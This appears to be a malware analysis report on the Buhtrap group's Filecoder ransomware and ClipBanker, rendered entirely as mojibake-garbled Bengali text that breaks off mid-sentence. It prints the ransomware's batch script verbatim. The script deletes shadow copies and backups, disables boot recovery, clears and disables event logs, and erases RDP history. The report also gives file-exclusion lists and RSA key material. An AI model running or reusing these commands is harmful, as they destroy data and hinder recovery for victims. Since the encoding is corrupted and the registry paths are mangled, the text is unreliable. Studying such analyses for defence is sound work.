āĻļā§āĻ°ā§ āĻāĻ°ā§ āĻ¯āĻžāĻ° āĻāĻ¨ā§āĻ¯ āĻ¤āĻžāĻĻā§āĻ° āĻāĻžāĻā§ āĻŦā§āĻ¯āĻā§āĻ¤āĻŋāĻāĻ¤ āĻā§ āĻāĻŋāĻ˛ āĻ¨āĻžāĨ¤
āĻĒā§āĻ°āĻāĻžāĻ°āĻžāĻāĻŋāĻ¯āĻžāĻ¨ā§āĻ° āĻ¸āĻžāĻĨā§ āĻāĻĄāĻŧāĻŋāĻ¤ āĻ¸āĻŽāĻ¸ā§āĻ¤ āĻļāĻāĻ¸āĻžāĻĒāĻ¤ā§āĻ° āĻāĻŦāĻ āĻ¤āĻžāĻ°āĻž āĻ¯ā§ āĻŽā§āĻ¯āĻžāĻ˛āĻāĻ¯āĻŧā§āĻ¯āĻžāĻ° āĻĒāĻ°āĻŋāĻŦāĻžāĻ°āĻā§āĻ˛āĻŋ āĻ¸ā§āĻŦāĻžāĻā§āĻˇāĻ° āĻāĻ°ā§ āĻ¸ā§āĻā§āĻ˛āĻŋ āĻ¨ā§āĻā§āĻ° āĻ¸āĻžāĻ°āĻŖā§āĻ¤ā§ āĻ¤āĻžāĻ˛āĻŋāĻāĻžāĻā§āĻā§āĻ¤ āĻāĻ°āĻž āĻšāĻ¯āĻŧā§āĻā§ā§ˇ
āĻāĻŽāĻ°āĻž āĻ
āĻ¨ā§āĻ¯āĻžāĻ¨ā§āĻ¯ āĻŽā§āĻ¯āĻžāĻ˛āĻāĻ¯āĻŧā§āĻ¯āĻžāĻ° āĻĒāĻ°āĻŋāĻŦāĻžāĻ°ā§āĻ° āĻ¸āĻžāĻĨā§ āĻ˛āĻŋāĻā§āĻ āĻ¸ā§āĻĨāĻžāĻĒāĻ¨ āĻāĻ°āĻ¤ā§ āĻāĻ āĻā§āĻĄ āĻ¸ā§āĻŦāĻžāĻā§āĻˇāĻ° āĻļāĻāĻ¸āĻžāĻĒāĻ¤ā§āĻ°āĻā§āĻ˛āĻŋāĻ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°ā§āĻāĻŋā§ˇ āĻŦā§āĻļāĻŋāĻ°āĻāĻžāĻ āĻļāĻāĻ¸āĻžāĻĒāĻ¤ā§āĻ°ā§āĻ° āĻāĻ¨ā§āĻ¯, āĻāĻŽāĻ°āĻž āĻāĻŽāĻ¨ āĻ¨āĻŽā§āĻ¨āĻž āĻā§āĻāĻā§ āĻĒāĻžāĻāĻ¨āĻŋ āĻ¯āĻž āĻāĻŋāĻāĻšāĻžāĻŦ āĻ¸āĻāĻā§āĻ°āĻšāĻ¸ā§āĻĨāĻ˛ā§āĻ° āĻŽāĻžāĻ§ā§āĻ¯āĻŽā§ āĻŦāĻŋāĻ¤āĻ°āĻŖ āĻāĻ°āĻž āĻšāĻ¯āĻŧāĻ¨āĻŋāĨ¤ āĻ¯āĻžāĻāĻšā§āĻ, TOV "MARIA" āĻļāĻāĻ¸āĻžāĻĒāĻ¤ā§āĻ°āĻāĻŋ āĻŦāĻāĻ¨ā§āĻā§āĻ° āĻ
āĻ¨ā§āĻ¤āĻ°ā§āĻāĻ¤ āĻŽā§āĻ¯āĻžāĻ˛āĻāĻ¯āĻŧā§āĻ¯āĻžāĻ° āĻ¸ā§āĻŦāĻžāĻā§āĻˇāĻ° āĻāĻ°āĻ¤ā§ āĻŦā§āĻ¯āĻŦāĻšā§āĻ¤ āĻšāĻ¯āĻŧā§āĻāĻŋāĻ˛
Win32/Filecoder.Buhtrap
āĻĒā§āĻ°āĻĨāĻŽ āĻāĻĒāĻžāĻĻāĻžāĻ¨ āĻ¯āĻž āĻāĻŽāĻžāĻĻā§āĻ° āĻĻā§āĻˇā§āĻāĻŋ āĻāĻāĻ°ā§āĻˇāĻŖ āĻāĻ°ā§āĻāĻŋāĻ˛ āĻ¨āĻ¤ā§āĻ¨ āĻāĻŦāĻŋāĻˇā§āĻā§āĻ¤ Win32/Filecoder.BuhtrapāĨ¤ āĻāĻāĻŋ āĻāĻāĻāĻŋ āĻĄā§āĻ˛āĻĢāĻŋ āĻŦāĻžāĻāĻ¨āĻžāĻ°āĻŋ āĻĢāĻžāĻāĻ˛ āĻ¯āĻž āĻāĻāĻ¨āĻ āĻāĻāĻ¨āĻ āĻĒā§āĻ¯āĻžāĻā§āĻ āĻāĻ°āĻž āĻšāĻ¯āĻŧāĨ¤ āĻāĻāĻŋ āĻŽā§āĻ˛āĻ¤ āĻĢā§āĻŦā§āĻ°ā§āĻ¯āĻŧāĻžāĻ°ā§-āĻŽāĻžāĻ°ā§āĻ 2019 āĻ āĻŦāĻŋāĻ¤āĻ°āĻŖ āĻāĻ°āĻž āĻšāĻ¯āĻŧā§āĻāĻŋāĻ˛āĨ¤ āĻāĻāĻŋ āĻāĻāĻāĻŋ ransomware āĻĒā§āĻ°ā§āĻā§āĻ°āĻžāĻŽā§āĻ° āĻŽāĻ¤ā§ āĻāĻāĻ°āĻŖ āĻāĻ°ā§ - āĻāĻāĻŋ āĻ¸ā§āĻĨāĻžāĻ¨ā§āĻ¯āĻŧ āĻĄā§āĻ°āĻžāĻāĻ āĻāĻŦāĻ āĻ¨ā§āĻāĻāĻ¯āĻŧāĻžāĻ°ā§āĻ āĻĢā§āĻ˛ā§āĻĄāĻžāĻ°āĻā§āĻ˛āĻŋ āĻ āĻ¨ā§āĻ¸āĻ¨ā§āĻ§āĻžāĻ¨ āĻāĻ°ā§ āĻāĻŦāĻ āĻ¸āĻ¨āĻžāĻā§āĻ¤ āĻāĻ°āĻž āĻĢāĻžāĻāĻ˛āĻā§āĻ˛āĻŋāĻā§ āĻāĻ¨āĻā§āĻ°āĻŋāĻĒā§āĻ āĻāĻ°ā§ā§ˇ āĻāĻ¨āĻā§āĻ°āĻŋāĻĒāĻļāĻ¨ āĻā§ āĻĒāĻžāĻ āĻžāĻ¨ā§āĻ° āĻāĻ¨ā§āĻ¯ āĻāĻāĻŋ āĻ¸āĻžāĻ°ā§āĻāĻžāĻ°ā§āĻ° āĻ¸āĻžāĻĨā§ āĻ¯ā§āĻāĻžāĻ¯ā§āĻ āĻāĻ°ā§ āĻ¨āĻž āĻŦāĻ˛ā§ āĻāĻĒā§āĻ¸ āĻāĻ°āĻžāĻ° āĻāĻ¨ā§āĻ¯ āĻāĻāĻŋāĻ° āĻāĻ¨ā§āĻāĻžāĻ°āĻ¨ā§āĻ āĻ¸āĻāĻ¯ā§āĻā§āĻ° āĻĒā§āĻ°āĻ¯āĻŧā§āĻāĻ¨ āĻ¨ā§āĻā§ˇ āĻĒāĻ°āĻŋāĻŦāĻ°ā§āĻ¤ā§, āĻāĻāĻŋ āĻŽā§āĻā§āĻ¤āĻŋāĻĒāĻŖ āĻŦāĻžāĻ°ā§āĻ¤āĻžāĻ° āĻļā§āĻˇā§ āĻāĻāĻāĻŋ "āĻā§āĻā§āĻ¨" āĻ¯ā§āĻ āĻāĻ°ā§ āĻāĻŦāĻ āĻ āĻĒāĻžāĻ°ā§āĻāĻ°āĻĻā§āĻ° āĻ¸āĻžāĻĨā§ āĻ¯ā§āĻāĻžāĻ¯ā§āĻ āĻāĻ°āĻ¤ā§ āĻāĻŽā§āĻ˛ āĻŦāĻž āĻŦāĻŋāĻāĻŽā§āĻ¸ā§āĻ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°āĻžāĻ° āĻĒāĻ°āĻžāĻŽāĻ°ā§āĻļ āĻĻā§āĻ¯āĻŧāĨ¤
āĻ¯āĻ¤āĻāĻž āĻ¸āĻŽā§āĻāĻŦ āĻ¸āĻāĻŦā§āĻĻāĻ¨āĻļā§āĻ˛ āĻ°āĻŋāĻ¸ā§āĻ°ā§āĻ¸ āĻāĻ¨āĻā§āĻ°āĻŋāĻĒā§āĻ āĻāĻ°āĻžāĻ° āĻāĻ¨ā§āĻ¯, Filecoder.Buhtrap āĻāĻāĻāĻŋ āĻĨā§āĻ°ā§āĻĄ āĻāĻžāĻ˛āĻ¨āĻž āĻāĻ°ā§ āĻ¯āĻž āĻŽā§āĻ˛ āĻ¸āĻĢā§āĻāĻāĻ¯āĻŧā§āĻ¯āĻžāĻ° āĻŦāĻ¨ā§āĻ§ āĻāĻ°āĻžāĻ° āĻāĻ¨ā§āĻ¯ āĻĄāĻŋāĻāĻžāĻāĻ¨ āĻāĻ°āĻž āĻšāĻ¯āĻŧā§āĻā§ āĻ¯āĻžāĻ¤ā§ āĻāĻ¨āĻā§āĻ°āĻŋāĻĒāĻļāĻ¨ā§ āĻšāĻ¸ā§āĻ¤āĻā§āĻˇā§āĻĒ āĻāĻ°āĻ¤ā§ āĻĒāĻžāĻ°ā§ āĻāĻŽāĻ¨ āĻŽā§āĻ˛ā§āĻ¯āĻŦāĻžāĻ¨ āĻ¤āĻĨā§āĻ¯ āĻ§āĻžāĻ°āĻŖāĻāĻžāĻ°ā§ āĻā§āĻ˛āĻž āĻĢāĻžāĻāĻ˛ āĻšā§āĻ¯āĻžāĻ¨ā§āĻĄāĻ˛āĻžāĻ° āĻĨāĻžāĻāĻ¤ā§ āĻĒāĻžāĻ°ā§āĨ¤ āĻ˛āĻā§āĻˇā§āĻ¯ āĻĒā§āĻ°āĻā§āĻ°āĻŋāĻ¯āĻŧāĻžāĻā§āĻ˛āĻŋ āĻŽā§āĻ˛āĻ¤ āĻĄāĻžāĻāĻžāĻŦā§āĻ¸ āĻŽā§āĻ¯āĻžāĻ¨ā§āĻāĻŽā§āĻ¨ā§āĻ āĻ¸āĻŋāĻ¸ā§āĻā§āĻŽ (DBMS)āĨ¤ āĻāĻĒāĻ°āĻ¨ā§āĻ¤ā§, Filecoder.Buhtrap āĻĄā§āĻāĻž āĻĒā§āĻ¨āĻ°ā§āĻĻā§āĻ§āĻžāĻ° āĻāĻ āĻŋāĻ¨ āĻāĻ°āĻ¤ā§ āĻ˛āĻ āĻĢāĻžāĻāĻ˛ āĻāĻŦāĻ āĻŦā§āĻ¯āĻžāĻāĻāĻĒ āĻŽā§āĻā§ āĻĻā§āĻ¯āĻŧāĨ¤ āĻāĻāĻŋ āĻāĻ°āĻ¤ā§, āĻ¨ā§āĻā§āĻ° āĻŦā§āĻ¯āĻžāĻ āĻ¸ā§āĻā§āĻ°āĻŋāĻĒā§āĻāĻāĻŋ āĻāĻžāĻ˛āĻžāĻ¨āĨ¤
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
Filecoder.Buhtrap āĻāĻ¯āĻŧā§āĻŦāĻ¸āĻžāĻāĻ āĻāĻŋāĻāĻŋāĻāĻ°āĻĻā§āĻ° āĻ¸āĻŽā§āĻĒāĻ°ā§āĻā§ āĻ¤āĻĨā§āĻ¯ āĻ¸āĻāĻā§āĻ°āĻš āĻāĻ°āĻžāĻ° āĻāĻ¨ā§āĻ¯ āĻĄāĻŋāĻāĻžāĻāĻ¨ āĻāĻ°āĻž āĻāĻāĻāĻŋ āĻŦā§āĻ§ āĻ āĻ¨āĻ˛āĻžāĻāĻ¨ āĻāĻāĻĒāĻŋ āĻ˛āĻāĻžāĻ° āĻĒāĻ°āĻŋāĻˇā§āĻŦāĻž āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°ā§āĨ¤ āĻāĻāĻŋ āĻ°âā§āĻ¯āĻžāĻ¨āĻ¸āĻŽāĻāĻ¯āĻŧā§āĻ¯āĻžāĻ°ā§āĻ° āĻļāĻŋāĻāĻžāĻ°āĻĻā§āĻ° āĻā§āĻ°ā§āĻ¯āĻžāĻ āĻāĻ°āĻžāĻ° āĻāĻĻā§āĻĻā§āĻļā§āĻ¯ā§ āĻāĻ°āĻž āĻšāĻ¯āĻŧā§āĻā§, āĻ¯āĻž āĻāĻŽāĻžāĻ¨ā§āĻĄ āĻ˛āĻžāĻāĻ¨ā§āĻ° āĻĻāĻžāĻ¯āĻŧāĻŋāĻ¤ā§āĻŦ:
mshta.exe "javascript:document.write('');"
āĻāĻ¨āĻā§āĻ°āĻŋāĻĒāĻļāĻ¨ā§āĻ° āĻāĻ¨ā§āĻ¯ āĻĢāĻžāĻāĻ˛āĻā§āĻ˛āĻŋ āĻ¨āĻŋāĻ°ā§āĻŦāĻžāĻāĻ¨ āĻāĻ°āĻž āĻšāĻ¯āĻŧ āĻ¯āĻĻāĻŋ āĻ¸ā§āĻā§āĻ˛āĻŋ āĻ¤āĻŋāĻ¨āĻāĻŋ āĻŦāĻ°ā§āĻāĻ¨ āĻ¤āĻžāĻ˛āĻŋāĻāĻžāĻ° āĻ¸āĻžāĻĨā§ āĻŽā§āĻ˛ā§ āĻ¨āĻžā§ˇ āĻĒā§āĻ°āĻĨāĻŽāĻ¤, āĻ¨āĻŋāĻŽā§āĻ¨āĻ˛āĻŋāĻāĻŋāĻ¤ āĻāĻā§āĻ¸āĻā§āĻ¨āĻļāĻ¨ āĻ¸āĻš āĻĢāĻžāĻāĻ˛āĻā§āĻ˛āĻŋ āĻāĻ¨āĻā§āĻ°āĻŋāĻĒā§āĻ āĻāĻ°āĻž āĻšāĻ¯āĻŧ āĻ¨āĻž: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys āĻāĻŦāĻ āĻŦā§āĻ¯āĻžāĻ āĻĻā§āĻŦāĻŋāĻ¤ā§āĻ¯āĻŧāĻ¤, āĻ¨ā§āĻā§āĻ° āĻ¤āĻžāĻ˛āĻŋāĻāĻž āĻĨā§āĻā§ āĻ¯ā§ āĻ¸āĻŽāĻ¸ā§āĻ¤ āĻĢāĻžāĻāĻ˛āĻā§āĻ˛āĻŋāĻ° āĻāĻ¨ā§āĻ¯ āĻ¸āĻŽā§āĻĒā§āĻ°ā§āĻŖ āĻĒāĻžāĻĨā§ āĻĄāĻŋāĻ°ā§āĻā§āĻāĻ°āĻŋ āĻ¸ā§āĻā§āĻ°āĻŋāĻ āĻ°āĻ¯āĻŧā§āĻā§ āĻ¸ā§āĻā§āĻ˛āĻŋ āĻŦāĻžāĻĻ āĻĻā§āĻāĻ¯āĻŧāĻž āĻšāĻ¯āĻŧā§āĻā§ā§ˇ
.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel
āĻ¤ā§āĻ¤ā§āĻ¯āĻŧāĻ¤, āĻ¨āĻŋāĻ°ā§āĻĻāĻŋāĻˇā§āĻ āĻĢāĻžāĻāĻ˛ā§āĻ° āĻ¨āĻžāĻŽāĻā§āĻ˛āĻŋāĻ āĻāĻ¨āĻā§āĻ°āĻŋāĻĒāĻļāĻ¨ āĻĨā§āĻā§ āĻŦāĻžāĻĻ āĻĻā§āĻāĻ¯āĻŧāĻž āĻšāĻ¯āĻŧā§āĻā§, āĻ¤āĻžāĻĻā§āĻ° āĻŽāĻ§ā§āĻ¯ā§ āĻŽā§āĻā§āĻ¤āĻŋāĻĒāĻŖ āĻŦāĻžāĻ°ā§āĻ¤āĻžāĻ° āĻĢāĻžāĻāĻ˛ā§āĻ° āĻ¨āĻžāĻŽāĨ¤ āĻ¤āĻžāĻ˛āĻŋāĻāĻž āĻ¨ā§āĻā§ āĻāĻĒāĻ¸ā§āĻĨāĻžāĻĒāĻ¨ āĻāĻ°āĻž āĻšāĻ¯āĻŧ. āĻ¸ā§āĻĒāĻˇā§āĻāĻ¤āĻ, āĻāĻ āĻ¸āĻŽāĻ¸ā§āĻ¤ āĻŦā§āĻ¯āĻ¤āĻŋāĻā§āĻ°āĻŽāĻā§āĻ˛āĻŋ āĻŽā§āĻļāĻŋāĻ¨āĻāĻŋ āĻāĻ˛āĻŽāĻžāĻ¨ āĻ°āĻžāĻāĻžāĻ° āĻāĻĻā§āĻĻā§āĻļā§āĻ¯ā§, āĻ¤āĻŦā§ āĻ¨ā§āĻ¯ā§āĻ¨āĻ¤āĻŽ āĻ°āĻžāĻ¸ā§āĻ¤āĻžāĻ° āĻ¯ā§āĻā§āĻ¯āĻ¤āĻžāĻ° āĻ¸āĻžāĻĨā§āĨ¤
boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe
āĻĢāĻžāĻāĻ˛ āĻāĻ¨āĻā§āĻ°āĻŋāĻĒāĻļāĻ¨ āĻ¸ā§āĻāĻŋāĻŽ
āĻāĻāĻŦāĻžāĻ° āĻāĻžāĻ°ā§āĻ¯āĻāĻ° āĻāĻ°āĻž āĻšāĻ˛ā§, āĻŽā§āĻ¯āĻžāĻ˛āĻāĻ¯āĻŧā§āĻ¯āĻžāĻ°āĻāĻŋ āĻāĻāĻāĻŋ 512-āĻŦāĻŋāĻ RSA āĻā§ āĻā§āĻĄāĻŧāĻž āĻ¤ā§āĻ°āĻŋ āĻāĻ°ā§ā§ˇ āĻĒā§āĻ°āĻžāĻāĻā§āĻ āĻāĻā§āĻ¸āĻĒā§āĻ¨ā§āĻ¨ā§āĻ (d) āĻāĻŦāĻ āĻŽāĻĄā§āĻ˛āĻžāĻ¸ (n) āĻ¤āĻžāĻ°āĻĒāĻ°ā§ āĻāĻāĻāĻŋ āĻšāĻžāĻ°ā§āĻĄ-āĻā§āĻĄā§āĻĄ 2048-āĻŦāĻŋāĻ āĻĒāĻžāĻŦāĻ˛āĻŋāĻ āĻā§ (āĻĒāĻžāĻŦāĻ˛āĻŋāĻ āĻāĻā§āĻ¸āĻĒā§āĻ¨ā§āĻ¨ā§āĻ āĻāĻŦāĻ āĻŽāĻĄā§āĻ˛āĻžāĻ¸), zlib-āĻĒā§āĻ¯āĻžāĻāĻĄ āĻāĻŦāĻ āĻŦā§āĻ¸64 āĻāĻ¨āĻā§āĻĄā§āĻĄ āĻĻāĻŋāĻ¯āĻŧā§ āĻāĻ¨āĻā§āĻ°āĻŋāĻĒā§āĻ āĻāĻ°āĻž āĻšāĻ¯āĻŧāĨ¤ āĻāĻ° āĻāĻ¨ā§āĻ¯ āĻĻāĻžāĻ¯āĻŧā§ āĻā§āĻĄāĻāĻŋ āĻāĻŋāĻ¤ā§āĻ° 2 āĻ āĻĻā§āĻāĻžāĻ¨ā§ āĻšāĻ¯āĻŧā§āĻā§āĨ¤
āĻāĻŋāĻ¤ā§āĻ° 2. 512-āĻŦāĻŋāĻ RSA āĻā§ āĻĒā§āĻ¯āĻŧāĻžāĻ° āĻā§āĻ¨āĻžāĻ°ā§āĻļāĻ¨ āĻĒā§āĻ°āĻā§āĻ°āĻŋāĻ¯āĻŧāĻžāĻ° āĻšā§āĻā§āĻ¸-āĻ°ā§ āĻĄāĻŋāĻāĻŽā§āĻĒāĻžāĻāĻ˛ā§āĻļāĻ¨ā§āĻ° āĻĢāĻ˛āĻžāĻĢāĻ˛āĨ¤
āĻ¨ā§āĻā§ āĻāĻāĻāĻŋ āĻā§āĻ¨āĻžāĻ°ā§āĻ āĻāĻ°āĻž āĻŦā§āĻ¯āĻā§āĻ¤āĻŋāĻāĻ¤ āĻā§ āĻ¸āĻš āĻ¸āĻžāĻ§āĻžāĻ°āĻŖ āĻĒāĻžāĻ ā§āĻ¯ā§āĻ° āĻāĻāĻāĻŋ āĻāĻĻāĻžāĻšāĻ°āĻŖ āĻ°āĻ¯āĻŧā§āĻā§, āĻ¯āĻž āĻŽā§āĻā§āĻ¤āĻŋāĻĒāĻŖ āĻŦāĻžāĻ°ā§āĻ¤āĻžāĻ° āĻ¸āĻžāĻĨā§ āĻ¸āĻāĻ¯ā§āĻā§āĻ¤ āĻāĻāĻāĻŋ āĻā§āĻā§āĻ¨ā§ˇ
DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239
āĻāĻā§āĻ°āĻŽāĻŖāĻāĻžāĻ°ā§āĻĻā§āĻ° āĻĒāĻžāĻŦāĻ˛āĻŋāĻ āĻā§ āĻ¨ā§āĻā§ āĻĻā§āĻāĻ¯āĻŧāĻž āĻšāĻ˛.
e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD
āĻĢāĻžāĻāĻ˛āĻā§āĻ˛āĻŋ āĻāĻāĻāĻŋ 128-āĻŦāĻŋāĻ āĻā§ āĻ¸āĻš AES-256-CBC āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°ā§ āĻāĻ¨āĻā§āĻ°āĻŋāĻĒā§āĻ āĻāĻ°āĻž āĻšāĻ¯āĻŧā§āĻā§āĨ¤ āĻĒā§āĻ°āĻ¤āĻŋāĻāĻŋ āĻāĻ¨āĻā§āĻ°āĻŋāĻĒā§āĻ āĻāĻ°āĻž āĻĢāĻžāĻāĻ˛ā§āĻ° āĻāĻ¨ā§āĻ¯, āĻāĻāĻāĻŋ āĻ¨āĻ¤ā§āĻ¨ āĻā§ āĻāĻŦāĻ āĻāĻāĻāĻŋ āĻ¨āĻ¤ā§āĻ¨ āĻĒā§āĻ°āĻžāĻ°āĻŽā§āĻāĻŋāĻ āĻā§āĻā§āĻāĻ° āĻ¤ā§āĻ°āĻŋ āĻāĻ°āĻž āĻšāĻ¯āĻŧāĨ¤ āĻŽā§āĻ˛ āĻ¤āĻĨā§āĻ¯ āĻāĻ¨āĻā§āĻ°āĻŋāĻĒā§āĻ āĻāĻ°āĻž āĻĢāĻžāĻāĻ˛ā§āĻ° āĻļā§āĻˇā§ āĻ¯ā§āĻ āĻāĻ°āĻž āĻšāĻ¯āĻŧāĨ¤ āĻāĻ¸ā§āĻ¨ āĻāĻ¨āĻā§āĻ°āĻŋāĻĒā§āĻ āĻāĻ°āĻž āĻĢāĻžāĻāĻ˛ā§āĻ° āĻŦāĻŋāĻ¨ā§āĻ¯āĻžāĻ¸ āĻŦāĻŋāĻŦā§āĻāĻ¨āĻž āĻāĻ°āĻž āĻ¯āĻžāĻāĨ¤
āĻāĻ¨āĻā§āĻ°āĻŋāĻĒā§āĻ āĻāĻ°āĻž āĻĢāĻžāĻāĻ˛āĻā§āĻ˛āĻŋāĻ° āĻ¨āĻŋāĻŽā§āĻ¨āĻ˛āĻŋāĻāĻŋāĻ¤ āĻļāĻŋāĻ°ā§āĻ¨āĻžāĻŽ āĻ°āĻ¯āĻŧā§āĻā§:
VEGA āĻŽā§āĻ¯āĻžāĻāĻŋāĻ āĻŽāĻžāĻ¨ āĻ¯ā§āĻ āĻāĻ°āĻžāĻ° āĻ¸āĻžāĻĨā§ āĻ¸ā§āĻ°ā§āĻ¸ āĻĢāĻžāĻāĻ˛ āĻĄā§āĻāĻž āĻĒā§āĻ°āĻĨāĻŽ 0x5000 āĻŦāĻžāĻāĻā§ āĻāĻ¨āĻā§āĻ°āĻŋāĻĒā§āĻ āĻāĻ°āĻž āĻšāĻ¯āĻŧā§āĻā§āĨ¤ āĻ¸āĻŽāĻ¸ā§āĻ¤ āĻĄāĻŋāĻā§āĻ°āĻŋāĻĒāĻļāĻ¨ āĻ¤āĻĨā§āĻ¯ āĻ¨āĻŋāĻŽā§āĻ¨āĻ˛āĻŋāĻāĻŋāĻ¤ āĻāĻžāĻ āĻžāĻŽā§ āĻ¸āĻš āĻāĻāĻāĻŋ āĻĢāĻžāĻāĻ˛ā§āĻ° āĻ¸āĻžāĻĨā§ āĻ¸āĻāĻ¯ā§āĻā§āĻ¤ āĻāĻ°āĻž āĻšāĻ¯āĻŧā§āĻā§:
- āĻĢāĻžāĻāĻ˛ā§āĻ° āĻāĻāĻžāĻ° āĻāĻŋāĻšā§āĻ¨āĻŋāĻ¤āĻāĻžāĻ°ā§āĻ¤ā§ āĻāĻāĻāĻŋ āĻāĻŋāĻšā§āĻ¨ āĻ°āĻ¯āĻŧā§āĻā§ āĻ¯āĻž āĻ¨āĻŋāĻ°ā§āĻĻā§āĻļ āĻāĻ°ā§ āĻ¯ā§ āĻĢāĻžāĻāĻ˛āĻāĻŋ āĻāĻāĻžāĻ°ā§ 0x5000 āĻŦāĻžāĻāĻā§āĻ° āĻā§āĻ¯āĻŧā§ āĻŦāĻĄāĻŧ āĻāĻŋāĻ¨āĻž
â AES āĻā§ āĻŦā§āĻ˛āĻŦ = ZlibCompress(RSAEncrypt(AES āĻā§ + IV, āĻ¤ā§āĻ°āĻŋ āĻāĻ°āĻž RSA āĻā§ āĻā§āĻĄāĻŧāĻžāĻ° āĻ¸āĻ°ā§āĻŦāĻāĻ¨ā§āĻ¨ āĻā§))
- RSA āĻā§ āĻŦā§āĻ˛āĻŦ = ZlibCompress(RSAEncrypt(āĻā§āĻ¨āĻžāĻ°ā§āĻ āĻāĻ°āĻž RSA āĻĒā§āĻ°āĻžāĻāĻā§āĻ āĻā§, āĻšāĻžāĻ°ā§āĻĄ āĻā§āĻĄā§āĻĄ RSA āĻĒāĻžāĻŦāĻ˛āĻŋāĻ āĻā§))
Win32/ClipBanker
Win32/ClipBanker āĻšāĻ˛ āĻāĻāĻāĻŋ āĻāĻĒāĻžāĻĻāĻžāĻ¨ āĻ¯āĻž āĻ āĻā§āĻā§āĻŦāĻ°ā§āĻ° āĻļā§āĻˇ āĻĨā§āĻā§ āĻĄāĻŋāĻ¸ā§āĻŽā§āĻŦāĻ° 2018 āĻ¸āĻžāĻ˛ā§āĻ° āĻļā§āĻ°ā§āĻ° āĻĻāĻŋāĻā§ āĻŽāĻžāĻā§ āĻŽāĻžāĻā§ āĻŦāĻŋāĻ¤āĻ°āĻŖ āĻāĻ°āĻž āĻšāĻ¯āĻŧā§āĻāĻŋāĻ˛āĨ¤ āĻāĻ° āĻā§āĻŽāĻŋāĻāĻž āĻšāĻ˛ āĻā§āĻ˛āĻŋāĻĒāĻŦā§āĻ°ā§āĻĄā§āĻ° āĻŦāĻŋāĻˇāĻ¯āĻŧāĻŦāĻ¸ā§āĻ¤ā§ āĻ¨āĻŋāĻ°ā§āĻā§āĻˇāĻŖ āĻāĻ°āĻž, āĻāĻāĻŋ āĻā§āĻ°āĻŋāĻĒā§āĻā§āĻāĻžāĻ°ā§āĻ¨ā§āĻ¸āĻŋ āĻāĻ¯āĻŧāĻžāĻ˛ā§āĻā§āĻ° āĻ āĻŋāĻāĻžāĻ¨āĻž āĻā§āĻāĻā§āĨ¤ āĻāĻžāĻ°ā§āĻā§āĻ āĻāĻ¯āĻŧāĻžāĻ˛ā§āĻ āĻ āĻŋāĻāĻžāĻ¨āĻž āĻ¨āĻŋāĻ°ā§āĻ§āĻžāĻ°āĻŖ āĻāĻ°āĻžāĻ° āĻĒāĻ°ā§, ClipBanker āĻāĻāĻŋāĻā§ āĻ āĻĒāĻžāĻ°ā§āĻāĻ°āĻĻā§āĻ° āĻ āĻ¨ā§āĻ¤āĻ°ā§āĻāĻ¤ āĻŦāĻ˛ā§ āĻŦāĻŋāĻļā§āĻŦāĻžāĻ¸ āĻāĻ°āĻž āĻ āĻŋāĻāĻžāĻ¨āĻž āĻĻāĻŋāĻ¯āĻŧā§ āĻĒā§āĻ°āĻ¤āĻŋāĻ¸ā§āĻĨāĻžāĻĒāĻ¨ āĻāĻ°ā§āĨ¤ āĻāĻŽāĻ°āĻž āĻ¯ā§ āĻ¨āĻŽā§āĻ¨āĻžāĻā§āĻ˛āĻŋ āĻĒāĻ°ā§āĻā§āĻˇāĻž āĻāĻ°ā§āĻāĻŋ āĻ¤āĻž 